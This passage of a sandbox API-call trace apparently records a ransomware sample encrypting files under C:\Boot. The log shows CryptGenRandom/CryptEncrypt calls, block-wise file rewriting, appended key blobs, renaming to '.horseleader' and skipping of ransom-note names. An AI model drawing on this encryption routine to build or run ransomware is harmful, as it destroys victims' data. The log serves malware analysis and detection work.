pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0121.092] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0121.092] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0121.092] lstrcmpW (lpString1="\\\\?\\C:\\Boot", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.092] GetProcessHeap () returned 0x780000 [0121.092] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b67f0 [0121.092] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: 
pszDest="\\\\?\\C:\\Boot\\*") returned 13 [0121.092] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName=".", cAlternateFileName="")) returned 0x7c66e0 [0121.093] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.093] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\.") returned 13 [0121.093] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.093] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0121.093] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0121.093] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0121.093] lstrlenW (lpString=".testttjffg") returned 11 [0121.093] StrStrW (lpFirst="\\\\?\\C:\\Boot\\.", lpSrch=".testttjffg") returned 0x0 [0121.093] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.094] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.094] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\." 
(normalized: "c:\\boot\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.094] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 1 [0121.094] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.094] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\..") returned 14 [0121.094] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.094] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0121.094] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0121.094] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0121.094] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0121.094] lstrlenW (lpString=".testttjffg") returned 11 [0121.094] StrStrW (lpFirst="\\\\?\\C:\\Boot\\..", lpSrch=".testttjffg") returned 0x0 [0121.095] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.095] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.095] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\.." 
(normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.095] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="BCD", cAlternateFileName="")) returned 1 [0121.095] lstrcmpiW (lpString1="BCD", lpString2="Windows") returned -1 [0121.095] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0121.095] StrStrIW (lpFirst="BCD", lpSrch=".horseleader") returned 0x0 [0121.095] lstrcmpW (lpString1="BCD", lpString2="#Decrypt#.txt") returned 1 [0121.095] lstrcmpW (lpString1="BCD", lpString2="_uninstalling_.png") returned 1 [0121.096] lstrlenW (lpString=".testttjffg") returned 11 [0121.096] StrStrW (lpFirst="\\\\?\\C:\\Boot\\BCD", lpSrch=".testttjffg") returned 0x0 [0121.096] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.096] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.096] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.096] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x26, 
ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0121.097] lstrcmpiW (lpString1="BCD.LOG", lpString2="Windows") returned -1 [0121.097] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0121.097] StrStrIW (lpFirst="BCD.LOG", lpSrch=".horseleader") returned 0x0 [0121.097] lstrcmpW (lpString1="BCD.LOG", lpString2="#Decrypt#.txt") returned 1 [0121.097] lstrcmpW (lpString1="BCD.LOG", lpString2="_uninstalling_.png") returned 1 [0121.097] lstrlenW (lpString=".testttjffg") returned 11 [0121.097] StrStrW (lpFirst="\\\\?\\C:\\Boot\\BCD.LOG", lpSrch=".testttjffg") returned 0x0 [0121.097] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.097] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.097] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0121.098] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x650052, dwReserved1=0x790063, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0121.098] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Windows") returned -1 [0121.098] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0121.099] StrStrIW (lpFirst="BCD.LOG1", lpSrch=".horseleader") returned 0x0 [0121.099] lstrcmpW (lpString1="BCD.LOG1", lpString2="#Decrypt#.txt") returned 1 [0121.099] lstrcmpW (lpString1="BCD.LOG1", lpString2="_uninstalling_.png") returned 1 [0121.099] lstrlenW (lpString=".testttjffg") returned 11 [0121.099] StrStrW (lpFirst="\\\\?\\C:\\Boot\\BCD.LOG1", lpSrch=".testttjffg") returned 0x0 [0121.099] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.099] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.099] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0121.100] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0121.100] StrStrW (lpFirst="BCD.LOG1", lpSrch=".txt") returned 0x0 [0121.100] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32af538 | out: lpFileSize=0x32af538*=0) returned 1 [0121.100] ReadFile (in: hFile=0x160, lpBuffer=0x32aa478, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesRead=0x32af55c*=0x0, lpOverlapped=0x0) returned 1 [0121.100] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.100] WriteFile (in: hFile=0x160, lpBuffer=0x32aa478*, nNumberOfBytesToWrite=0x0, 
lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesWritten=0x32af55c*=0x0, lpOverlapped=0x0) returned 1 [0121.101] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.101] WriteFile (in: hFile=0x160, lpBuffer=0x32af530*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af530*, lpNumberOfBytesWritten=0x32af55c*=0x4, lpOverlapped=0x0) returned 1 [0121.102] WriteFile (in: hFile=0x160, lpBuffer=0x32af478*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af478*, lpNumberOfBytesWritten=0x32af55c*=0x80, lpOverlapped=0x0) returned 1 [0121.102] CloseHandle (hObject=0x160) returned 1 [0121.615] GetProcessHeap () returned 0x780000 [0121.615] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.615] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1.horseleader") returned 32 [0121.615] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.LOG1.horseleader" (normalized: "c:\\boot\\bcd.log1.horseleader")) returned 1 [0121.616] GetProcessHeap () returned 0x780000 [0121.616] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.616] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 
[0121.617] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Windows") returned -1 [0121.617] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0121.617] StrStrIW (lpFirst="BCD.LOG2", lpSrch=".horseleader") returned 0x0 [0121.617] lstrcmpW (lpString1="BCD.LOG2", lpString2="#Decrypt#.txt") returned 1 [0121.617] lstrcmpW (lpString1="BCD.LOG2", lpString2="_uninstalling_.png") returned 1 [0121.617] lstrlenW (lpString=".testttjffg") returned 11 [0121.617] StrStrW (lpFirst="\\\\?\\C:\\Boot\\BCD.LOG2", lpSrch=".testttjffg") returned 0x0 [0121.617] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.618] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.618] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0121.618] lstrlenW (lpString="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0121.618] StrStrW (lpFirst="BCD.LOG2", lpSrch=".txt") returned 0x0 [0121.618] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32af538 | out: lpFileSize=0x32af538*=0) returned 1 [0121.619] ReadFile (in: hFile=0x160, lpBuffer=0x32aa478, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesRead=0x32af55c*=0x0, lpOverlapped=0x0) returned 1 [0121.619] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.619] WriteFile (in: hFile=0x160, lpBuffer=0x32aa478*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, 
lpNumberOfBytesWritten=0x32af55c*=0x0, lpOverlapped=0x0) returned 1 [0121.619] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.619] WriteFile (in: hFile=0x160, lpBuffer=0x32af530*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af530*, lpNumberOfBytesWritten=0x32af55c*=0x4, lpOverlapped=0x0) returned 1 [0121.621] WriteFile (in: hFile=0x160, lpBuffer=0x32af478*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af478*, lpNumberOfBytesWritten=0x32af55c*=0x80, lpOverlapped=0x0) returned 1 [0121.621] CloseHandle (hObject=0x160) returned 1 [0121.623] GetProcessHeap () returned 0x780000 [0121.623] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.623] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2.horseleader") returned 32 [0121.623] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="\\\\?\\C:\\Boot\\BCD.LOG2.horseleader" (normalized: "c:\\boot\\bcd.log2.horseleader")) returned 1 [0121.624] GetProcessHeap () returned 0x780000 [0121.624] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.625] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0121.625] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Windows") returned -1 
[0121.625] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0121.625] StrStrIW (lpFirst="BOOTSTAT.DAT", lpSrch=".horseleader") returned 0x0 [0121.625] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="#Decrypt#.txt") returned 1 [0121.625] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="_uninstalling_.png") returned 1 [0121.625] lstrlenW (lpString=".testttjffg") returned 11 [0121.625] StrStrW (lpFirst="\\\\?\\C:\\Boot\\BOOTSTAT.DAT", lpSrch=".testttjffg") returned 0x0 [0121.625] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0121.626] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0121.626] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0121.642] lstrlenW (lpString="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0121.642] StrStrW (lpFirst="BOOTSTAT.DAT", lpSrch=".txt") returned 0x0 [0121.642] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x32af538 | out: lpFileSize=0x32af538*=65536) returned 1 [0121.642] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.643] ReadFile (in: hFile=0x200, lpBuffer=0x32aa478, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesRead=0x32af55c*=0x5000, lpOverlapped=0x0) returned 1 [0121.646] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.646] WriteFile (in: hFile=0x200, lpBuffer=0x32aa478*, 
nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesWritten=0x32af55c*=0x5000, lpOverlapped=0x0) returned 1 [0121.646] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x5800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.647] ReadFile (in: hFile=0x200, lpBuffer=0x32aa478, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesRead=0x32af55c*=0x5000, lpOverlapped=0x0) returned 1 [0121.647] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.647] WriteFile (in: hFile=0x200, lpBuffer=0x32aa478*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesWritten=0x32af55c*=0x5000, lpOverlapped=0x0) returned 1 [0121.648] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xb000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.648] ReadFile (in: hFile=0x200, lpBuffer=0x32aa478, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesRead=0x32af55c*=0x5000, lpOverlapped=0x0) returned 1 [0121.648] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.648] WriteFile (in: hFile=0x200, lpBuffer=0x32aa478*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32aa478*, lpNumberOfBytesWritten=0x32af55c*=0x5000, lpOverlapped=0x0) returned 1 [0121.649] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.649] WriteFile (in: hFile=0x200, lpBuffer=0x32af530*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af530*, lpNumberOfBytesWritten=0x32af55c*=0x4, lpOverlapped=0x0) returned 1 [0121.649] WriteFile (in: hFile=0x200, lpBuffer=0x32af478*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af55c, lpOverlapped=0x0 | out: lpBuffer=0x32af478*, lpNumberOfBytesWritten=0x32af55c*=0x80, lpOverlapped=0x0) returned 1 [0121.650] CloseHandle (hObject=0x200) returned 1 [0121.660] GetProcessHeap () returned 0x780000 [0121.660] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.660] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.horseleader") returned 36 [0121.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT.horseleader" (normalized: "c:\\boot\\bootstat.dat.horseleader")) returned 1 [0121.661] GetProcessHeap () returned 0x780000 [0121.661] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.661] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0121.662] lstrcmpiW (lpString1="cs-CZ", lpString2="Windows") returned -1 [0121.662] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0121.662] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0121.662] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0121.662] lstrcmpW 
(lpString1="\\\\?\\C:\\Boot\\cs-CZ", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0121.662] GetProcessHeap () returned 0x780000 [0121.662] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0121.662] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\*") returned 19 [0121.662] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0121.663] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0121.663] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\.") returned 19 [0121.663] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0121.663] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0121.663] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0121.664] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\..") returned 20 [0121.664] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0121.664] lstrcmpW 
(lpString1="..", lpString2="..") returned 0 [0121.664] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0121.664] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0121.664] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: 